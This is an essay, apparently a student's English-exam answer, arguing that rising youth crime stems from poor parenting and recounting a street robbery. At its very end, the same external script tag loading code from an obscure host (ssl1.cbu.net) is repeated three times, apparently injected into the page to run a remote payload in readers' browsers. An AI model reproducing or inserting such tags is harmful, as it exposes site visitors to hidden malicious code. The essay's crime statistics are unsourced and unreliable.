The only way to solve the increasing crime rate of young offenders is to teach parents better parenting skills. To what extent do you agree?

The world is growing in technology,Social life,cultures what not in every field it is showing progression. Although we are developing in the running world,crime rate is also increasing in huge scale. Since last two years crime rate is increased 5% than the earlier. it's so sad that majority of people in enhancing crime rate are younger people.

I believe the situation exist purely lack of parenting skills, The parents are not taking there children life seriously and not teaching them basic discipline and life skills, because of this young people are going in short cuts and ruining their lifes.Even though it makes heart heavy, we need to agree 10% of the crime in the world is done by people under 15.

I need to explain you the live crime i have seen,that's saturday june 12th some where around 5 pm i was walking in little crowded area. The are is full of young people and gangsters i realised that am in wrong place shouldn't be their long so, thought of moving from there and booked the cab. In the mean time few young people came near me and asked photograph, I wondered i am not celebrity why these are coming to me and asking for photo, i replied sorry i got to go. Then the few people warned me not to go from there and asked me to sit on lap. I was not left with another option, i had to do it. They took all my money and left me.

I feel many from this generation, Don't know the value of money.They want to earn in shortcuts and finally behind the bars, some young are educating and being great social and economic life in society, this problem exists because of parents are not showing right directions to there childs.<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>